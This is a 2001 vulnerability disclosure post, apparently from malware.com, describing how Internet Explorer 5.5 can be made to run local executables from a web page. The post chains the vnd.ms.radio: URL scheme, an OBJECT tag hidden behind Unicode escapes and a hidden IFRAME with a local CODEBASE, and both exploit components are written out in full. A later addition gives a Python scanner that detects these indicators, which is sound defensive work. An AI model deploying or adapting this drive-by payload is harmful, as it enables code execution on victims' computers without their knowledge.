Sunday, April 1, 2001

Default installation of Internet Explorer 5.5 with all of its so-called patches, service "packs" etc. still allows us to execute files on default installations of the target computer.

Once again, we cobble together new and old components as follows:

1. Courtesy of Georgi Guninski (http://www.securityfocus.com/bid/1978)
2. Courtesy of Dildog (http://www.securityfocus.com/bid/1394)
3. vnd.ms.radio:http://www.malware.com/

Internet Explorer 5.5 has a "neat" built-in radio system, an oft-touted wonder feature. This incredible feature enjoys its own URL scheme, the so-called "vnd.ms.radio:".

What we then do is take our Georgi Guninski <object data="" type="text/html"> and point it to our so-called "vnd.ms.radio:" *.url. But first we create yet another HTML page comprising our generic object courtesy of Dildog and point that to the file we wish to execute. Specifically:

Component 1

    document.writeln('\u003c\u004f\u0042\u004a\u0045\u0043\u0054\u0020\u0044\u0041\u0054\u0041\u003d\u0022\u0043\u003a\u005c\u0057\u0049\u004e\u0044\u004f\u0057\u0053\u005c\u0054\u0045\u004d\u0050\u005c\u0072\u0061\u0064\u0069\u006f\u002e\u0075\u0072\u006c\u0022\u0020\u0054\u0059\u0050\u0045\u003d\u0022\u0074\u0065\u0078\u0074\u002f\u0068\u0074\u006d\u006c\u0022\u0020\u0057\u0049\u0044\u0054\u0048\u003d\u0032\u0030\u0030\u0020\u0048\u0045\u0049\u0047\u0048\u0054\u003d\u0032\u0030\u0030\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u004f\u0042\u004a\u0045\u0043\u0054\u003e');

(The escaped string is simply <OBJECT DATA="C:\WINDOWS\TEMP\radio.url" TYPE="text/html" WIDTH=200 HEIGHT=200 style="display:none"></OBJECT> written out character by character as \uXXXX escapes.)

Component 2

    <IFRAME SRC="vnd.ms.radio:http://www.malware.com/infosec/US-eng/drivel/hahaha?<BODY><OBJECT CLASSID='CLSID:10000000-0000-0000-0000-000000000000' CODEBASE='C:\WINDOWS\Regedit.exe'></OBJECT> </BODY></HTML>" WIDTH=100 HEIGHT=100 STYLE="DISPLAY:NONE"></IFRAME>

What happens is our so-called "vnd.ms.radio:" URL is called, but because there is no 'real' audio file to play, it creates a named file in our C:\WINDOWS\TEMP; we include in the so-called "vnd.ms.radio:" URL our code to execute our file. We then call our so-called "vnd.ms.radio:" *.url through our Component 1, which parses it as HTML and in turn, being outside the so-called "Security Zones", fires our generic object, which then executes! our file.

Working Example:

[note: tested on default installation of Win98 and default installation of IE5.5, both patched to the hilt]

http://www.malware.com/drivel.html

Notes:

1. Again, default installs of both OS and IE5.5 (both fully patched as of today's date)
2. Unable to include external code at this time. No time. No interest.
3. Monster 1.5Meg patch dated August 09, 2000 does absolutely nothing (http://www.microsoft.com/technet/security/bulletin/MS00-055.asp)
4. Disable ActiveX and Scripting and relocate the temp folder.

---
http://www.malware.com
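A defender-side check for the pattern this post describes, added here as an example and not part of the post or of malware.com's page: it expands \uXXXX escapes the way the script engine does before document.writeln() emits them as markup, then looks for the vnd.ms.radio: scheme, the near-null CLSID, and OBJECT DATA/CODEBASE attributes that point at local drive paths. The sample pages and the example.invalid host are constructed.

```python
import re

# \uXXXX escapes as the JavaScript engine expands them before document.writeln() emits markup
JS_UNICODE = re.compile(r"\\u([0-9a-fA-F]{4})")

# Markers of the technique described in the post, matched on the decoded markup
INDICATORS = {
    "vnd_ms_radio_url": re.compile(r"vnd\.ms\.radio:", re.I),
    "null_clsid": re.compile(r"clsid:10000000-0000-0000-0000-000000000000", re.I),
    # <OBJECT DATA="C:\..."> renders a local file as HTML outside the security zones
    "object_local_data": re.compile(r"""<object[^>]+data\s*=\s*['"]?[a-z]:\\""", re.I),
    # <OBJECT CODEBASE='C:\...exe'> names a local executable as the control's code base
    "object_local_codebase": re.compile(r"""<object[^>]+codebase\s*=\s*['"]?[a-z]:\\[^'">]*\.exe""", re.I),
}


def decode_js_unicode(text):
    """Expand \\uXXXX escapes so markup hidden inside string literals becomes visible."""
    return JS_UNICODE.sub(lambda m: chr(int(m.group(1), 16)), text)


def scan_page(html):
    """Return the sorted indicator names found in a page, after decoding JS escapes.
    'escaped_markup' is added when an indicator appears only after decoding,
    i.e. the markup was hidden behind \\uXXXX escapes."""
    raw_hits = {name for name, rx in INDICATORS.items() if rx.search(html)}
    decoded_hits = {name for name, rx in INDICATORS.items() if rx.search(decode_js_unicode(html))}
    hits = raw_hits | decoded_hits
    if decoded_hits - raw_hits:
        hits.add("escaped_markup")
    return sorted(hits)


def js_escape(s):
    """Constructed test input only: write every character as a \\uXXXX escape."""
    return "".join(f"\\u{ord(c):04x}" for c in s)


# Constructed samples (not the post's live page): the escaped OBJECT from Component 1,
# the IFRAME from Component 2 with a placeholder host, and a benign embed.
SAMPLE_COMPONENT1 = "document.writeln('" + js_escape(
    '<OBJECT DATA="C:\\WINDOWS\\TEMP\\radio.url" TYPE="text/html" style="display:none"></OBJECT>') + "');"
SAMPLE_COMPONENT2 = (
    "<IFRAME SRC=\"vnd.ms.radio:http://example.invalid/x?<BODY><OBJECT "
    "CLASSID='CLSID:10000000-0000-0000-0000-000000000000' "
    "CODEBASE='C:\\WINDOWS\\Regedit.exe'></OBJECT></BODY>\" STYLE=\"DISPLAY:NONE\"></IFRAME>"
)
SAMPLE_BENIGN = '<object data="https://example.invalid/player.swf" type="application/x-shockwave-flash"></object>'

if __name__ == "__main__":
    for name, page in [("component1", SAMPLE_COMPONENT1), ("component2", SAMPLE_COMPONENT2), ("benign", SAMPLE_BENIGN)]:
        print(name, scan_page(page))
```

Note that a path such as C:\users followed by four hex digits would also be expanded; on real pages, run the decoder over script text only.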
